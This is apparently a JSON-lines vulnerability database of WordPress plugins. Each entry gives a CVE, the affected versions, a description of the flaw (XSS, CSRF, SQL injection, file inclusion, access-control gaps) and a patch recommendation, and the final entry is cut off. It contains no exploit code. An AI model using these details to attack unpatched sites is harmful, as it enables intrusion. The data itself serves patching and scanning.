{"CVE_ID":"CVE-2024-13705","slug":"stageshow","versionImpact":"9.8.6","versionEndExcluding":"10.0","description":"The StageShow plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 9.8.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/admin\\\/stageshow_manage_seating.php#L502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/admin\\\/stageshow_manage_seating.php#L502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c5a6436-1a08-4b3d-ab85-e5f75f216ab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c5a6436-1a08-4b3d-ab85-e5f75f216ab8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4468","slug":"salon-booking-system","versionImpact":"9.9","versionEndExcluding":"10.0","description":"The Salon booking system plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on several functions hooked into admin_init in all versions up to, and including, 9.9. This makes it possible for authenticated attackers with subscriber access or higher to modify plugin settings and view discount codes intended for other users.","recommendation":"Update to version 10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b73f864-68b5-4ba8-93a3-37f2564cc240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b73f864-68b5-4ba8-93a3-37f2564cc240?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11417","slug":"dejureorg-vernetzungsfunktion","versionImpact":"1.97.5","versionEndExcluding":"1.98.0","description":"The dejure.org Vernetzungsfunktion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.97.5. This is due to missing or incorrect nonce validation on the djo_einstellungen_menue() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.98.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dejureorg-vernetzungsfunktion\\\/trunk\\\/dejure.org-vernetzung.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dejureorg-vernetzungsfunktion\\\/trunk\\\/dejure.org-vernetzung.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfe35762-2cb1-4b62-8865-ab217ff29450?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfe35762-2cb1-4b62-8865-ab217ff29450?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13635","slug":"vk-blocks","versionImpact":"1.94.2.2","versionEndExcluding":"1.95.0.3","description":"The VK Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.94.2.2 via the page content block. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of private posts and pages.","recommendation":"Update to version 1.95.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233455\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233455\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3233455%40vk-blocks%2Ftrunk&old=3227170%40vk-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3233455%40vk-blocks%2Ftrunk&old=3227170%40vk-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc03b3f4-2edb-463b-812b-6a187a7a893c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc03b3f4-2edb-463b-812b-6a187a7a893c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6159","slug":"push-notification-for-post-and-buddypress","versionImpact":"1.93","versionEndExcluding":"1.94","description":"The Push Notification for Post and BuddyPress WordPress plugin before 1.9.4 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"Update to version 1.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de20ebda-b0bc-489e-a8d3-e9487a2b48e8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de20ebda-b0bc-489e-a8d3-e9487a2b48e8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3740","slug":"school-management","versionImpact":"93.1.0","versionEndExcluding":"1.93.1 (02-07-2025)","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 93.1.0 via the 'page' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The Local File Inclusion exploit can be chained to include various dashboard view files in the plugin. One such chain can be leveraged to update the password of Super Administrator accounts in Multisite environments making privilege escalation possible. The vendor has updated the version numbers beginning with `1.93.1 (02-07-2025)` for the patched version. This version comes after version 93.1.0.","recommendation":"Update to version 1.93.1 (02-07-2025), or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032#item-description__update-history\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032#item-description__update-history\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3604aece-5e76-4e8e-9caf-f518d6001277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3604aece-5e76-4e8e-9caf-f518d6001277?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10877","slug":"advanced-form-integration","versionImpact":"1.92.0","versionEndExcluding":"1.92.1","description":"The AFI \u2013 The Easiest Integration Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.92.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.92.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/936de04d-9b80-430b-a8b7-9755b68e2a02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/936de04d-9b80-430b-a8b7-9755b68e2a02?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/tags\\\/1.91.4\\\/includes\\\/class-adfoin-log-table.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/tags\\\/1.91.4\\\/includes\\\/class-adfoin-log-table.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185778\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185778\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13430","slug":"pagelayer","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.8 via the 'pagelayer_builder_posts_shortcode' function due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private posts that they should not have access to.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252081\\\/pagelayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252081\\\/pagelayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de8da4c-dee7-4d59-a475-a969008aa0d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de8da4c-dee7-4d59-a475-a969008aa0d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4874","slug":"bricksbuilder","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"The Bricks Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.9.8 via the postId parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify posts and pages created by other users including admins. As a requirement for this, an admin would have to enable access to the editor specifically for such a user or enable it for all users with a certain user account type.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d63e898-43e5-42b5-96b6-1453352e0cae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d63e898-43e5-42b5-96b6-1453352e0cae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bricksbuilder.io\\\/release\\\/bricks-1-9-9\\\/#access-control-fix-for-user-role-contributor\",\"name\":\"https:\\\/\\\/bricksbuilder.io\\\/release\\\/bricks-1-9-9\\\/#access-control-fix-for-user-role-contributor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35738","slug":"chatbot-chatgpt","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kognetiks Kognetiks Chatbot for WordPress allows Stored XSS.This issue affects Kognetiks Chatbot for WordPress: from n\/a through 1.9.8.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-1-9-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-1-9-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1891","slug":"helpie-faq","versionEndExcluding":"1.9.9","description":"The Accordion & FAQ WordPress plugin before 1.9.9 does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5d993f-cc20-4b5f-b4c8-c13004151828\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5d993f-cc20-4b5f-b4c8-c13004151828\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1926","slug":"pagelayer","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.8. This is due to missing or incorrect nonce validation on the pagelayer_save_post function. This makes it possible for unauthenticated attackers to modify post contents via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/1.9.8\\\/init.php#L477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/1.9.8\\\/init.php#L477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/542b6312-b264-49d5-882a-454427c60c8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/542b6312-b264-49d5-882a-454427c60c8a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4542","slug":"compact-wp-audio-player","versionEndExcluding":"1.9.8","description":"The Compact WP Audio Player WordPress plugin before 1.9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0bef96f-dfe2-4988-adf8-e1bd493c5242\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0bef96f-dfe2-4988-adf8-e1bd493c5242\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10475","slug":"lead-form-builder","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Responsive Contact Form Builder & Lead Generation Plugin WordPress plugin before 1.9.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faca59fb-6b59-45b0-8b97-c4125d9d3cb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faca59fb-6b59-45b0-8b97-c4125d9d3cb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1950","slug":"woo-product-carousel-slider-and-grid-ultimate","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.7 via deserialization of untrusted input via shortcode. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-meta-box.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-meta-box.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7&old=3045923&new_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.8&new=3045923&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7&old=3045923&new_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.8&new=3045923&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12268","slug":"responsive-block-editor-addons","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Responsive Blocks \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'responsive-block-editor-addons\/portfolio' block in all versions up to, and including, 1.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208350\\\/responsive-block-editor-addons\\\/tags\\\/1.9.8\\\/src\\\/blocks\\\/portfolio\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208350\\\/responsive-block-editor-addons\\\/tags\\\/1.9.8\\\/src\\\/blocks\\\/portfolio\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e951b97-3d17-4360-8fec-393e2f0c13d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e951b97-3d17-4360-8fec-393e2f0c13d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6751","slug":"hostinger","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Hostinger plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the function publish_website in all versions up to, and including, 1.9.7. This makes it possible for unauthenticated attackers to enable and disable maintenance mode.","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d89cf759-5e5f-43e2-90a9-a8e554653ee1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d89cf759-5e5f-43e2-90a9-a8e554653ee1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010008%40hostinger%2Ftrunk&old=3010004%40hostinger%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010008%40hostinger%2Ftrunk&old=3010004%40hostinger%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11455","slug":"include-mastodon-feed","versionImpact":"1.9.4","versionEndExcluding":"1.9.6","description":"The Include Mastodon Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'include-mastodon-feed' shortcode in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/include-mastodon-feed\\\/tags\\\/1.9.5\\\/plugin.php#L730\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/include-mastodon-feed\\\/tags\\\/1.9.5\\\/plugin.php#L730\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ed075f2-778a-49f5-bd6e-439cd3f1cee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ed075f2-778a-49f5-bd6e-439cd3f1cee6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11280","slug":"password-protect-page","versionImpact":"1.9.5","versionEndExcluding":"1.9.6","description":"The PPWP \u2013 Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 1.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208393\\\/password-protect-page\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208393\\\/password-protect-page\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ac0d84-dff4-4a03-a530-cac47ffaf2bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ac0d84-dff4-4a03-a530-cac47ffaf2bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3794","slug":"wpforms-lite","versionImpact":"1.9.5","versionEndExcluding":"1.9.5.1","description":"The WPForms \u2013 Easy Form Builder for WordPress \u2013 Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the start_timestamp parameter in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.4.2\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L3154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.4.2\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L3154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/179eb680-e8d8-4918-96e3-e67217771c29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/179eb680-e8d8-4918-96e3-e67217771c29?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4955","slug":"tarteaucitronjs","versionImpact":"1.9.4","versionEndExcluding":"1.9.5","description":"The tarteaucitron.io WordPress plugin before 1.9.5 uses query parameters from YouTube oEmbed URLs without sanitizing these parameters correctly, which could allow users with the contributor role and above to perform Stored Cross-site Scripting attacks.","recommendation":"Update to version 1.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b84a73a4-7e9b-4994-a9bb-ad47f7cf45da\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b84a73a4-7e9b-4994-a9bb-ad47f7cf45da\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12184","slug":"contact-forms","versionImpact":"1.9.4","versionEndExcluding":"1.9.5","description":"The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the accua_forms_download_submitted_file() function in all versions up to, and including, 1.9.4. This makes it possible for unauthenticated attackers to download other user submitted forms.","recommendation":"Update to version 1.9.5, or a newer patched 